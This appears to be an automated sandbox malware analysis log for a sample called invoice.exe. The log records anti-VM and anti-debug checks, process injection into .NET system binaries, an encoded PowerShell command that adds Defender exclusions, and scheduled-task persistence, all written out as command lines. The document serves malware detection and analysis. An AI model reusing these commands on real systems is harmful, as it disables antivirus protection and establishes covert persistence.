                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 104400, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: 4D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: 6840000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: 8840000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599407
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598360
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 1981
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6576
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3086
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7376Thread sleep count: 802 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599891s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7376Thread sleep count: 1981 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599766s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599641s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599532s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599407s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 104284Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599297s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599187s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -599078s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -598969s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -598860s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -598735s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -598610s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -598485s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7256Thread sleep time: -598360s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep count: 6576 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 104440Thread sleep count: 3086 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\invoice.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599891
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599407
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 30000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599187
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 599078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598969
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598860
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598735
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598485
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 598360
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwaretrat
                  Source: Amcache.hve.9.drBinary or memory string: VMware
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxservice
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: AppLaunch.exe, 0000000F.00000002.1791695388.0000000009CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmwareuser
                  Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                  Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000894000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
                  Source: AppLaunch.exe, 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                  Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5A0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Encrypted powershell cmdline option found
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#5Kms8#> Add-MpPreference <#wH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#clJa8cj9Z#> -Force <#tWC#>
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#5Kms8#> Add-MpPreference <#wH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#clJa8cj9Z#> -Force <#tWC#>
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5A0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5A0000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3EC008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1085008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4661008Jump to behavior
                  Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c dir /b "*.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe "4usfliof.exe" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe "yee9mbi69cm7.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajaduaswbtahmaoaajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahcasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbjagwasgbhadgaywbqadkawgajad4aiaataeyabwbyagmazqagadwaiwb0afcaqwajad4a"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
